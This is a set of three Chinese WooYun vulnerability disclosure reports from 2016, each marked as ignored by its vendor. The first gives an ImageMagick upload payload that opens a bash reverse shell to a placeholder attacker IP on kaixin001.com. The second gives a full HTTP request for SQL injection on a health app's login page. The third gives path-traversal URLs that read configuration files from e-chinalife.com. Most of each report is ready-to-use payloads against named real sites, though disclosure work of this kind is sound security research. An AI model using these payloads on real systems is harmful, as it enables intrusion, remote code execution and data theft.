漏洞详情披露状态： 2016-05-31： 细节已通知厂商并且等待厂商处理中2016-05-31： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-12： 厂商已经主动忽略漏洞，细节向公众公开简要描述：RT详细说明：今天的漏洞code 区域http://www.kaixin001.com/set/logo.php修改头像处。可以通过以下payload像之前一样反弹shellcode 区域push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1" pop graphic-context、上传正常图片的时候抓包，把上面这个payload直接添加上去就可以了直接反弹shell漏洞证明： code 区域http://www.kaixin001.com/photo/upload.php http://www.kaixin001.com/lifetime/perfect.php上传图片处用以下payloadcode 区域push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1" pop graphic-context上传一个正常的照片，然后抓包添加payload，上传反弹shell都是源码 修复方案：改改改版权声明：转载请注明来源 千机@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-12 14:00厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情 披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中 2016-05-01： 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-05-09： 厂商已经主动忽略漏洞，细节向公众公开 简要描述： APP安全之SQL注入 详细说明： 目标：健康猫IOS APP 检测发现以下地方存在SQL注入：（POST中的userName，报错注入） code 区域POST http://manager.healthmall.tv:8088/SyatemManagement/NewLogin.aspx HTTP/1.1 Host: manager.healthmall.tv:8088 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://manager.healthmall.tv:8088/SyatemManagement/NewLogin.aspx Cookie: ASP.NET_SessionId=cii0sasoh20r0l1orftfyopc Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 303 __LASTFOCUS=&__EVENTTARGET=btnReg&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJLTQ0MjcxMjc2ZGQGTBwj%2Fczj7lfItnWl9QZzEJgcj74by1rg5%2FG4Yud1rA%3D%3D&__VIEWSTATEGENERATOR=B6DB7F69&userName=admin&userPassword=asdf&code=DSFZ&txtMobCode= 漏洞证明： 1、当前数据库用户，root 2、所有数据库 3、用户表，仅列出数字作为证明，具体就不深入了 修复方案： 请多指教~ 版权声明：转载请注明来源 路人甲@乌云 漏洞回应 厂商回应： 危害等级：无影响厂商忽略 忽略时间：2016-05-09 09:00 厂商回复： 漏洞Rank：15 (WooYun评价) 最新状态： 暂无

漏洞详情披露状态： 2016-06-01： 细节已通知厂商并且等待厂商处理中2016-06-01： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-07： 厂商已经主动忽略漏洞，细节向公众公开简要描述：绕过限制下载任意文件详细说明：问题出在此处http://www.e-chinalife.com/product/benefitshow/indexlis.jsp?RiskCode=415构造code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\downloadToHTML.jsp&titleDoc=1 漏洞证明： code 区域if (fileName.indexOf("../")!=-1) { %> <html><body> 访问地址非法！！ </body> </html>仅当路径中出现../的时候提示访问地址非法，所以可以用\来绕过code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/WEB-INF\/web.xml&titleDoc=1你懂的code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/sys\/sysLog.jsp&titleDoc=1 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-07 09:50厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无